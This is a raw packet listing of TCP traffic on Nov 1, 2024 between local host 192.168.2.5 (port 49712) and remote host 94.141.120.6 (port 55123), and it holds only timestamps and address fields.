                                                            Nov 1, 2024 08:37:12.321835041 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.321857929 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.326541901 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.326590061 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.326601982 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.326605082 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.326647043 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.326656103 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.326662064 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.326669931 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.326678991 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.326692104 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.326697111 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.326699972 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.326709032 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.326735020 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.326747894 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.326756001 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.326776981 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.326792955 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.326792955 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.326841116 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.331625938 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.331635952 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.331653118 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.331660986 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.331671000 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.331676960 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.331705093 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.331712008 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.331717014 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.331723928 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.331759930 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.331763029 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.331767082 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.331815958 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.331825972 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.331832886 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.331855059 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.331859112 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.331865072 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.331867933 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.331877947 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.331911087 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.336574078 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.336596012 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.336618900 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.336626053 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.336637974 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.336648941 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.336667061 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.336700916 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.336755991 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.336764097 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.336800098 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.336812973 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.336821079 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.336853027 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.336860895 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.336870909 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.336879969 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.336889982 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.336895943 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.336898088 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.336919069 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.336920023 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.336926937 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.336961031 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.341713905 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.341727972 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.341768026 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.341768026 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.341778994 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.341793060 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.341795921 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.341813087 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.341830969 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.341958046 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.341968060 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.342008114 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.342029095 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.342036963 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.342046022 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.342066050 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.342068911 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.342078924 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.342087984 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.342094898 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.342097044 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.342123985 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.342124939 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.342134953 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.342161894 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.346869946 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.346882105 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.346924067 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.346993923 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.347002983 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.347038031 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.347039938 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.347075939 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.347105026 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.347112894 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.347121000 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.347137928 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.347146034 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.347147942 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.347162008 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.347187996 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.347194910 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.347212076 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.347222090 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.347233057 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.347245932 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.347265959 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.347285986 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.351974010 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.352046013 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.352255106 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.352298021 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.352302074 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.352324009 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.352332115 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.352353096 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.352365971 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.352374077 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.352380037 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.352380991 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.352421045 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.352618933 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.352658987 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.352677107 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.352684975 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.352691889 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.352700949 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.352705002 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.352716923 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.352730036 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.352741003 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.352763891 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.356976986 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.357031107 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.357063055 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.357105970 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.357229948 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.357239962 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.357279062 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.357290983 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.357300043 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.357331991 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.357362986 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.357373953 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.357399940 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.357410908 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.357494116 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.357502937 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.357511997 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.357548952 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.357548952 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.357631922 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.357641935 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.357676029 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.357677937 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.357692957 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.357711077 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.361860991 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.361926079 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.361929893 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.361963987 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.362008095 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.362066031 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.362097025 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.362138033 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.362198114 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.362206936 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.362240076 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.362409115 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.362418890 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.362495899 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.362499952 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.362509012 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.362538099 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.362546921 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.362555981 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.362577915 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.362581968 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.362591028 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.362622023 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.362634897 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.362643003 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.362664938 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.362679958 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.366857052 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.366882086 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.366898060 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.366904974 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.366905928 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.366923094 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.366924047 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.366945028 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.366956949 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.367043018 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.367050886 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.367089033 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.367269039 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.367304087 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.367355108 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.367396116 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.367460966 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.367503881 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.367506027 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.367543936 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.367567062 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.367577076 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.367607117 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.367611885 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.367616892 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.367630005 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.367636919 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.367671967 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.367847919 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.367888927 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.371826887 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.371839046 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.371855021 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.371865034 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.371884108 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.371900082 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.371903896 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.371910095 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.371918917 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.371942043 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.371957064 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.372116089 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.372149944 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.372209072 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.372243881 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.372277975 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.372312069 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.372315884 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.372351885 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.372371912 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.372407913 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.372415066 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.372417927 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.372450113 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.372554064 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.372591972 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.372606993 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.372615099 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.372662067 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.372684956 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.372734070 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.376780033 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.376806974 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.376815081 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.376822948 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.376837015 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.376838923 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.376848936 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.376857996 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.376862049 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.376878023 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.376893997 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.376910925 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.376986027 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.377031088 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.377060890 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.377098083 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.377104044 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.377142906 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.377213955 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.377223015 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.377250910 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.377258062 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.377286911 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.377347946 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.377389908 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.377477884 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.377485991 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.377516031 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.377527952 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.377645969 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.377684116 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.381844044 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.381853104 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.381899118 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.381921053 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.381928921 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.381957054 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.381968975 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.382006884 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382033110 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382040977 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.382066011 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.382100105 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382107973 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382113934 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382137060 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.382152081 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.382169962 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382178068 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382184982 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382193089 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382205963 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.382208109 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382215977 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382219076 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382221937 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.382249117 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.382283926 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382292032 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382312059 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.382325888 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.382652044 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.382698059 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.386957884 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.386981010 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.386990070 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.387006998 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.387027979 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.387033939 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.387070894 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.387193918 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.387202024 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.387248993 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.387263060 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.387303114 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.387336969 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.387351036 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.387391090 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.387402058 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.387411118 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.387418032 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.387428045 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.387433052 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.387450933 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.387469053 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.387562990 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.387571096 CET551234971294.141.120.6192.168.2.5
